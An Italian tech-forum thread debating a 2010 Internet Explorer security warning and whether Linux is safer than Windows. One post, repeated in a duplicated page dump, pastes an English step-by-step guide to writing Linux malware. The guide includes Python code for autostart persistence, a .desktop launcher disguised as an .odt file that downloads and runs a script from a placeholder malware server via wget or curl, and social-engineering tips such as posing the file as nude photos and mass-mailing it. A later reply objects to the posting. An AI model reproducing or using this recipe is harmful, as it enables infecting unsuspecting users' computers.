No a Explorer, c'è la Francia

AntonioBO · 19-01-2010, 10:12

BERLINO - Il giallo della minaccia a Internet Explorer continua. Microsoft ha reagito prontamente e ha assicurato che solo le versioni più vecchie del browser più diffuso nel mondo, per esempio la 6, possono essere vulnerabili ad attacchi ostili in ambiente Windows, mentre la versione 8 e quelle più recenti e più diffuse sono sicure. Ma intanto la Certa, un'agenzia governativa francese, si è unita oggi - secondo il sito online dell'autorevole BBC (l'ente radiotelevisivo del Regno Unito) - al monito dell'autorità di controllo tedesca della settimana scorsa, invitando a sua volta gli utenti della rete a non usare Internet Explorer.

La stessa Certa ammette comunque che Internet Explorer 8 è il più sicuro dei browser, ma non giura sulla sua sicurezza assoluta. Microsoft Italia avverte, per bocca di Feliciano Intini, che gli attacchi mirati di hacker e altre entità ostili sono stati condotti solo in casi sporadici, e unicamente contro alcune aziende, utilizzando le vulnerabilità di chi usa ancora le versioni più vecchie di internet explorer, come appunto la 6. Nella sola Italia ben 15 milioni di utenti hanno scaricato Internet explorer 8, il cui il filtro smart screen ha consentito di bloccare 275 milioni di attacchi di malware. Microsoft si appella agli utenti: usate il browser, è sicuro, ma usatelo con le massime condizioni possibili di sicurezza. Usate le istruzioni contenute nel SECURITY ADVISER 979352. Il numero uno mondiale del software precisa anche che è impegnato a fondo a risolvere il problema e a proteggere gli utenti, e che interverrà in tempo reale fornendo soluzioni agli utenti ogni qualvolta queste avranno raggiunto un livello qualitativo abbastanza elevato da essere distribuita a tutti.

Internet Explorer 8, ribattono i francesi di Certa, è molto sicuro ma non esiste la garanzia dell'invulnerabilità assoluta. I rischi più seri sono comunque per chi usa IE 6: può entrarti nel computer un "troian" che rende il pirata informatico padrone del tuo pc e gli consente di scaricare e diffondere a tua insaputa dati sensibili. Secondo Graham Cluley, della Sophos, un'azienda britannica specializzata nella sicurezza dei computer, anche IE 8 non è invulnerabile, e occorre un upgrading costante.

Cosa farà allora il popolo internettiano in tutto il pianeta? Con quali browser potrà navigare sentendosi al sicuro, e non come un bagnante che nuota in mare quando sulla spiaggia sventola la bandiera rossa dell'allarme? Il suggerimento di cambiare browser, dice Cliff Evans, è poco valido: anche gli altri prodotti hanno le loro vulnerabilità, magari in altri punti del loro codice, comunque non c'è assolutamente alcuna garanzia che siano più sicuri di quelli di Microsoft. Quindi attenti a non cedere alla tentazione frettolosa di abbandonare subito Microsoft: i suoi concorrenti magari cavalcano la tigre del caso ma non offrono garanzie migliori.
Repubblica

Questi articoli mi fanno fare grasse risate. Sono quasi quattro anni che uso solo Linux e mi sono felicemente dimenticato di sbattermi tra antivirus che succhiano il sangue al processore e appesantiscono il sistema, firewall che mi bloccano inopinatamente siti innocui, anti spyware, aggiornamenti degli antivirus ecc....MHA! Sono sempre più convinto che Windows esiste perché c'è la pirateria!

trallallero · 19-01-2010, 10:23

Quote:

Originariamente inviato da AntonioBO

Questi articoli mi fanno fare grasse risate. Sono quasi quattro anni che uso solo Linux e mi sono felicemente dimenticato di sbattermi tra antivirus che succhiano il sangue al processore e appesantiscono il sistema, firewall che mi bloccano inopinatamente siti innocui, anti spyware, aggiornamenti degli antivirus ecc....MHA! Sono sempre più convinto che Windows esiste perché c'è la pirateria!

Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux

AntonioBO · 19-01-2010, 10:29

Quote:

Originariamente inviato da trallallero

Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux

Io sono solo un utente, ma so che è molto più difficile fare danni ad un sistema basato su Linux. Ma tecnicamente non sono preparato eppure uso Linux. Ma era difficile??

Unrue · 19-01-2010, 10:43

Quote:

Originariamente inviato da trallallero

Beh, non spargere troppo la voce perchè se le percentuali di utilizzo di Linux e Windows si invertissero, avresti da lottare contro i virus e trojan su Linux

Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..

AntonioBO · 19-01-2010, 10:46

Quote:

Originariamente inviato da Unrue

Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..

la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.

Unrue · 19-01-2010, 10:50

Quote:

Originariamente inviato da AntonioBO

la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.

Esatto

trallallero · 19-01-2010, 10:54

Quote:

Originariamente inviato da Unrue

Io non ne sarei così sicuro. La teoria security through obscurity non sempre vale, anzi la filosofia Open Source ha largamente mostrato il contrario. Poi ovviamente molto dipende dalla bontà del codice scritto. Puoi scrivere codice fallato sia open che closed source..

Che i sistemi Unix-like siano più stabili non è un mistero infatti sono i più usati dal lato server, ma questo non vuol dire che non siano violabili.
I virus/trojan esistono per esigenza di mercato (poter vendere antivirus) e perchè qualcuno vuole farsi i fatti tuoi e spiare i tuoi dati.
Ora, se solo l'1%, ma mettiamo anche il 2%, usa Linux, chi è che si mette a fare un virus/trojan per sistemi Unix-like ? cosa ne guadagna ? spiccioli.
Il s.o. inviolabile non esiste, basta una semplice necessità di mercato che gli hackers un buco lo trovano.

Oh, lo dico da Ubuntu user eh, non da fanatico di Windows

trallallero · 19-01-2010, 10:56

Quote:

Originariamente inviato da AntonioBO

la differenza è nel closed source solo quelli autorizzati possono visionare il codice, nell'open source c'è una vasta anzi vastissima schiera di persone capaci che tappano eventuali malware.

Questo è vero, ma non significa che non sia possibile creare un virus per Linux.

AntonioBO · 19-01-2010, 11:00

Quote:

Originariamente inviato da trallallero

Questo è vero, ma non significa che non sia possibile creare un virus per Linux.

E' possibilissimo. Ma fanno molto meno danni. Questo è quello che ho capito, ma non chiedermi il perché in quanto non saprei spiegarlo

Unrue · 19-01-2010, 11:05

Quote:

Originariamente inviato da trallallero

Che i sistemi Unix-like siano più stabili non è un mistero infatti sono i più usati dal lato server, ma questo non vuol dire che non siano violabili.
I virus/trojan esistono per esigenza di mercato (poter vendere antivirus) e perchè qualcuno vuole farsi i fatti tuoi e spiare i tuoi dati.
Ora, se solo l'1%, ma mettiamo anche il 2%, usa Linux, chi è che si mette a fare un virus/trojan per sistemi Unix-like ? cosa ne guadagna ? spiccioli.

Non ho detto che Linux/Unix sia inviolabile, magari lo fosse, ma solo che non è dimostrato che più un sistema è diffuso e più è bacato.( windows in questo caso) E' solo potenzialmente più attaccabile. Ma ne caso di Windows, se viene trovata una falla fino a che Microsoft non ci mette una pezza il buco resta, e a volte è capitato che la patch ritardasse o addirittura arrivasse dopo molto tempo. Su Linux, stai tranquillo che a breve viene tappata, anzi se uno ha competenze, può tapparsela da solo.

Quote:

Originariamente inviato da trallallero

Il s.o. inviolabile non esiste, basta una semplice necessità di mercato che gli hackers un buco lo trovano..

In realtà, dovremmo fare una statistica tra il numero di attacchi riusciti e quelli non riusciti verso un sistema. Se un sistema respinge il 99% degli attacchi non mi sento di dire che è insicuro.

trallallero · 19-01-2010, 11:09

How to write a Linux virus in 5 easy steps

Compact step-by-step guide

Ok, so here is the summary then, which also fills in a few more specific details:

1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server.

2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects.

For example, to create the shortcut for KDE, all you need to write in Python is:

import os
uname = os.getlogin()
drop_dir = “/home/%s/.kde/Autostart” % uname)
os.makedirs(drop_dir)
os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py")

For Gnome the Python script instead needs to write a launcher into the proper directory:

import os
relauncher_str = """
[Desktop Entry]
Type=Application
Name=Malware
Exec=python .local/.hidden/s.py
Icon=system-run
"""
uname = os.getlogin()
drop_dir = “/home/%s/.config/autostart” % uname
os.makedirs(drop_dir)
f = open(drop_dir+”/Malware.desktop”, “w”)
f.write(relauncher_str)
f.close()

Writing these autostart entries is probably some of the first action that your malware should perform.

3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this:

[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons.

The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot.

Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not.

4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless.

5. Send this email out to as many email addresses as you can get a hold of.

Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again.

That was easy, wasn't it?

gugoXX · 19-01-2010, 11:52

Io certe cose non le posterei, anche se facili da trovare altrimenti oppure magari non funzionanti.
Che non ci siano sistemi inviolabili lo sanno tutti, e che i malware vengano concentrati sui sistemi piu' diffusi anche.

I problemi dati dai virus che fanno uso di vulnerabilita' di sistemi operativi o software correlati sono molto ridotti.
Il problema piu' grande e' il
"Clicca qui" e gli utenti che lo fanno.
"Apri qui" e gli utenti aprono.
"Scrivi qui i codici della banca" e gli utenti che lo fanno.
E non ci sono sicurezze che tengano.
Fino a una decina d'anni fa i virus erano molto piu' scaltri di oggi, perche il target erano utenti mediamente esperti. Oggi, nella massa, qualche utente ignaro lo si trova.

19-01-2010, 11:55

Quote:

Originariamente inviato da gugoXX

Io certe cose non le posterei, anche se facili da trovare altrimenti oppure magari non funzionanti.
Che non ci siano sistemi inviolabili lo sanno tutti, e che i malware vengano concentrati sui sistemi piu' diffusi anche.

I problemi dati dai virus che fanno uso di vulnerabilita' di sistemi operativi o software correlati sono molto ridotti.
Il problema piu' grande e' il
"Clicca qui" e gli utenti che lo fanno.
"Apri qui" e gli utenti aprono.
"Scrivi qui i codici della banca" e gli utenti che lo fanno.
E non ci sono sicurezze che tengano.
Fino a una decina d'anni fa i virus erano molto piu' scaltri di oggi, perche il target erano utenti mediamente esperti. Oggi, nella massa, qualche utente ignaro lo si trova.

Sara' perche evito i "clicca, apri, scrivi" il motivo per il quale non ho malware sul mio WXP?

das · 19-01-2010, 13:08

Quote:

Originariamente inviato da mixkey

Sara' perche evito i "clicca, apri, scrivi" il motivo per il quale non ho malware sul mio WXP?

Mi sa di sì. Io uso windows, non ho mai installato un antivirus e di virus nella mia vita ne ho presi solo 2:

- November 17 (per DOS) nei primi anni '90
- Blaster con windows 2000 una decina d'anni fa

Un sacco di gente che conosco ha il pc infognato nonostante abbia comprato il PC con già l'antivirus installato in partenza. Non capisco come facciano.

19-01-2010, 13:18

Quote:

Originariamente inviato da das

Mi sa di sì. Io uso windows, non ho mai installato un antivirus e di virus nella mia vita ne ho presi solo 2:

- November 17 (per DOS) nei primi anni '90
- Blaster con windows 2000 una decina d'anni fa

Un sacco di gente che conosco ha il pc infognato nonostante abbia comprato il PC con già l'antivirus installato in partenza. Non capisco come facciano.

Io mi ricordo di Sasser.

Main · 19-01-2010, 13:26

Quote:

Originariamente inviato da AntonioBO

i suoi concorrenti magari cavalcano la tigre del caso ma non offrono garanzie migliori.
Repubblica

Questa è la parte più divertente dell'articolo

Jabberwock · 19-01-2010, 13:33

Quote:

Originariamente inviato da AntonioBO

E' possibilissimo. Ma fanno molto meno danni. Questo è quello che ho capito, ma non chiedermi il perché in quanto non saprei spiegarlo

Perche' con Linux non si gira con i diritti a palla (root), cosa che, con Windows, accadeva fino a XP... e che in realta' continua ad accadere, visto che in molti (pseudo?) esperti consigliano di disattivare UAC appena acceso il computer e su 7, AFAIK, il livello di sicurezza e' stato ridotto per non far apparire l'avviso troppo spesso (?????

?????)!

Poi bisogna anche vedere che s'intende per molti meno danni: magari non ti tira giu' l'OS, ma se il malware pialla la home, per me sono comunque molti danni!

tdi150cv · 19-01-2010, 13:51

Quote:

Originariamente inviato da AntonioBO

Io sono solo un utente, ma so che è molto più difficile fare danni ad un sistema basato su Linux. Ma tecnicamente non sono preparato eppure uso Linux. Ma era difficile??

effettivamente che l'os alternativo sia meno vulnerabile non ci sono dubbi , pero' il tempo che perdi nell'installare una chiave onda alice su linux è maggiore di quello che impiegheresti con windows a rifare la macchina danneggiata da un virus. (e ho fatto solo un esempio ma ce ne sono di piu' paradossali che mi sono capitati ... prova tu su mandriva , provai con la 10 , a configurare a 1440x900 un monitor acer 19" wide screen senza dover mettere mano al codice di configurazione)
Questo è il problema e cosi' sarà sempre fino a quando anche i produttori hardware non si metteranno in mente di andare oltre ai driver windows.

aeterna · 19-01-2010, 13:58

Quote:

Originariamente inviato da AntonioBO

La stessa Certa ammette comunque che Internet Explorer 8 è il più sicuro dei browser, ma non giura sulla sua sicurezza assoluta

a me risulta che in informatica la sicurezza assoluta non esista.
e quindi di cosa stanno a parlare?
lo giudicano sicuro, però non gli va bene lo stesso e quindi consigliano di optare per un browser sicuro al 100%... che però non esisterà mai.

mah, mi sembra tanto un attacco politico/economico.

trallallero · 19-01-2010, 13:59

Quote:

Originariamente inviato da tdi150cv

effettivamente che l'os alternativo sia meno vulnerabile non ci sono dubbi , pero' il tempo che perdi nell'installare una chiave onda alice su linux è maggiore di quello che impiegheresti con windows a rifare la macchina danneggiata da un virus. (e ho fatto solo un esempio ma ce ne sono di piu' paradossali che mi sono capitati ... prova tu su mandriva , provai con la 10 , a configurare a 1440x900 un monitor acer 19" wide screen senza dover mettere mano al codice di configurazione)
Questo è il problema e cosi' sarà sempre fino a quando anche i produttori hardware non si metteranno in mente di andare oltre ai driver windows.

Ma solo a voi succedono 'ste cose ?

Io ho 2 monitor al lavoro di cui uno un piccolo touch panel e lavoro contemporaneamente con entrambi, configurati in 15 secondi con Ubuntu.
Il touch panel volendo, per divertirmi, lo uso anche come mouse.

Non è che hai provato con Mandriva 0.1 versione alfa anno 1980 (d.C. per essere più precisi) ?

19-01-2010, 10:12	#1
AntonioBO Senior Member Iscritto dal: Apr 2006 Città: dove mi pare. Linux per sempre Messaggi: 1121	No a Explorer, c'è la Francia BERLINO - Il giallo della minaccia a Internet Explorer continua. Microsoft ha reagito prontamente e ha assicurato che solo le versioni più vecchie del browser più diffuso nel mondo, per esempio la 6, possono essere vulnerabili ad attacchi ostili in ambiente Windows, mentre la versione 8 e quelle più recenti e più diffuse sono sicure. Ma intanto la Certa, un'agenzia governativa francese, si è unita oggi - secondo il sito online dell'autorevole BBC (l'ente radiotelevisivo del Regno Unito) - al monito dell'autorità di controllo tedesca della settimana scorsa, invitando a sua volta gli utenti della rete a non usare Internet Explorer. La stessa Certa ammette comunque che Internet Explorer 8 è il più sicuro dei browser, ma non giura sulla sua sicurezza assoluta. Microsoft Italia avverte, per bocca di Feliciano Intini, che gli attacchi mirati di hacker e altre entità ostili sono stati condotti solo in casi sporadici, e unicamente contro alcune aziende, utilizzando le vulnerabilità di chi usa ancora le versioni più vecchie di internet explorer, come appunto la 6. Nella sola Italia ben 15 milioni di utenti hanno scaricato Internet explorer 8, il cui il filtro smart screen ha consentito di bloccare 275 milioni di attacchi di malware. Microsoft si appella agli utenti: usate il browser, è sicuro, ma usatelo con le massime condizioni possibili di sicurezza. Usate le istruzioni contenute nel SECURITY ADVISER 979352. Il numero uno mondiale del software precisa anche che è impegnato a fondo a risolvere il problema e a proteggere gli utenti, e che interverrà in tempo reale fornendo soluzioni agli utenti ogni qualvolta queste avranno raggiunto un livello qualitativo abbastanza elevato da essere distribuita a tutti. Internet Explorer 8, ribattono i francesi di Certa, è molto sicuro ma non esiste la garanzia dell'invulnerabilità assoluta. I rischi più seri sono comunque per chi usa IE 6: può entrarti nel computer un "troian" che rende il pirata informatico padrone del tuo pc e gli consente di scaricare e diffondere a tua insaputa dati sensibili. Secondo Graham Cluley, della Sophos, un'azienda britannica specializzata nella sicurezza dei computer, anche IE 8 non è invulnerabile, e occorre un upgrading costante. Cosa farà allora il popolo internettiano in tutto il pianeta? Con quali browser potrà navigare sentendosi al sicuro, e non come un bagnante che nuota in mare quando sulla spiaggia sventola la bandiera rossa dell'allarme? Il suggerimento di cambiare browser, dice Cliff Evans, è poco valido: anche gli altri prodotti hanno le loro vulnerabilità, magari in altri punti del loro codice, comunque non c'è assolutamente alcuna garanzia che siano più sicuri di quelli di Microsoft. Quindi attenti a non cedere alla tentazione frettolosa di abbandonare subito Microsoft: i suoi concorrenti magari cavalcano la tigre del caso ma non offrono garanzie migliori. Repubblica Questi articoli mi fanno fare grasse risate. Sono quasi quattro anni che uso solo Linux e mi sono felicemente dimenticato di sbattermi tra antivirus che succhiano il sangue al processore e appesantiscono il sistema, firewall che mi bloccano inopinatamente siti innocui, anti spyware, aggiornamenti degli antivirus ecc....MHA! Sono sempre più convinto che Windows esiste perché c'è la pirateria! __________________ "mo va a fer dal pugnàt! THO' UN CUOCO .....(Daniele Luttazzi Raiperunanotte 25/03/2010)

19-01-2010, 11:09	#11
trallallero Senior Member Iscritto dal: May 2006 Città: Wursteland Messaggi: 1749	How to write a Linux virus in 5 easy steps Compact step-by-step guide Ok, so here is the summary then, which also fills in a few more specific details: 1. Write a piece of malware of your choice. Maybe as a Python script? Good language, efficient code, pre-installed in most Linux distros and powerful standard library support (for example, libraries for sending HTTP requests and handling SMTP are part of most standard installs). Place that malware on some web-server. 2. Your malware needs the ability to install a launcher for itself so that it is started whenever the user logs in. As mentioned, for Gnome that means creating a launcher description in the ~/.config/autostart folder. For KDE just link to your executable from within the ~/.kde/Autostart directory. To do that the malware code can either just force the issue and copy a launcher or link to itself into both locations (creating any directories along the way if they don't exist) or it can be a bit smarter and choose the right thing to do based on the desktop environment that it detects. For example, to create the shortcut for KDE, all you need to write in Python is: import os uname = os.getlogin() drop_dir = “/home/%s/.kde/Autostart” % uname) os.makedirs(drop_dir) os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir+“/s.py") For Gnome the Python script instead needs to write a launcher into the proper directory: import os relauncher_str = """ [Desktop Entry] Type=Application Name=Malware Exec=python .local/.hidden/s.py Icon=system-run """ uname = os.getlogin() drop_dir = “/home/%s/.config/autostart” % uname os.makedirs(drop_dir) f = open(drop_dir+”/Malware.desktop”, “w”) f.write(relauncher_str) f.close() Writing these autostart entries is probably some of the first action that your malware should perform. 3. Now create a desktop launcher file for the installer of the malware, which is different than the launcher we use to restart the malware after a reboot. The desktop launcher for the installer is what we send as attachment in the email to the targeted user. It's what the user clicks on after they saved it. Try something like this: [Desktop Entry] Type=Application Name=some_text.odt Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi; python $DROP/s.py' Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png Note that we have specified a name that is harmless looking and even chose an icon that makes it look like a normal document (that particular icon is present on both Ubuntu (Gnome) and Kubuntu (KDE) systems, but annoyingly not on Fedora). If you claim to send nude shots in the email, just give it a name that makes it sound like an image (something with .jpg at the end) and chose one of the appropriate standard image icons. The Exec line is a bit longer now, because we have to account for the possibility that either wget is installed or curl. For example, Ubuntu systems usually have wget, while Fedora comes with curl. So, we pass the appropriate commands to bash in order to check which one is present and then call the correct command to download the malware. I'm not a bash expert, so there might be a much more efficient way to do this. But you get the idea. Also, in that line we are creating a good location for the script ($DROP), which is not immediately obvious. The mkdir command with the -p option will silently create whatever parent directories are necessary. The target directory is in the user's home, hidden away in some innocent looking local directory and can only be seen when also displaying hidden files. The /tmp directory of course is not a good place for our malware, since it is wiped with each reboot. Save this launcher file under the name you specified with the Name line, but add '.desktop' to the end of the actual file name. So, in our case, you would save the file as 'some_text.odt.desktop'. When you place this on your desktop you will see that Gnome or KDE will treat it in a special way, not displaying the '.desktop' extension. So, the file just appears as 'some_text.odt'. Of course, that also means that the mail attachment will have this extension as well. Some users may notice, many others will not. 4. Attach this file to an email, which prompts the recipient to save and open the attachment. As explained, once it has been saved it will just appear as 'some_text.odt' on the user's desktop. And with the icon we have chosen in the launcher description it will look quite harmless. 5. Send this email out to as many email addresses as you can get a hold of. Voila! A Linux virus in 5 simple steps. Every user that saves and opens the attachment you have sent them will get themselves infected with the malware script of your choice, which is then also restarted whenever the user logs in again. That was easy, wasn't it? __________________ Nintendo WIII 4d Turbo Intercooler - Sestium X 666 99,312 GHz - 6.984 Ram Σ(9999) MHz - HDD SATA 97e^(10) bytes 93³ rpm - ATI biberon X900z ∞Mb - Win Eight SP (1 > yours) 16 Valve

19-01-2010, 11:52	#12
gugoXX Senior Member Iscritto dal: May 2004 Città: Londra (Torino) Messaggi: 3692	Io certe cose non le posterei, anche se facili da trovare altrimenti oppure magari non funzionanti. Che non ci siano sistemi inviolabili lo sanno tutti, e che i malware vengano concentrati sui sistemi piu' diffusi anche. I problemi dati dai virus che fanno uso di vulnerabilita' di sistemi operativi o software correlati sono molto ridotti. Il problema piu' grande e' il "Clicca qui" e gli utenti che lo fanno. "Apri qui" e gli utenti aprono. "Scrivi qui i codici della banca" e gli utenti che lo fanno. E non ci sono sicurezze che tengano. Fino a una decina d'anni fa i virus erano molto piu' scaltri di oggi, perche il target erano utenti mediamente esperti. Oggi, nella massa, qualche utente ignaro lo si trova. __________________ Se pensi che il tuo codice sia troppo complesso da capire senza commenti, e' segno che molto probabilmente il tuo codice e' semplicemente mal scritto. E se pensi di avere bisogno di un nuovo commento, significa che ti manca almeno un test.

Strumenti
Mostra una versione stampabile Invia questa pagina per email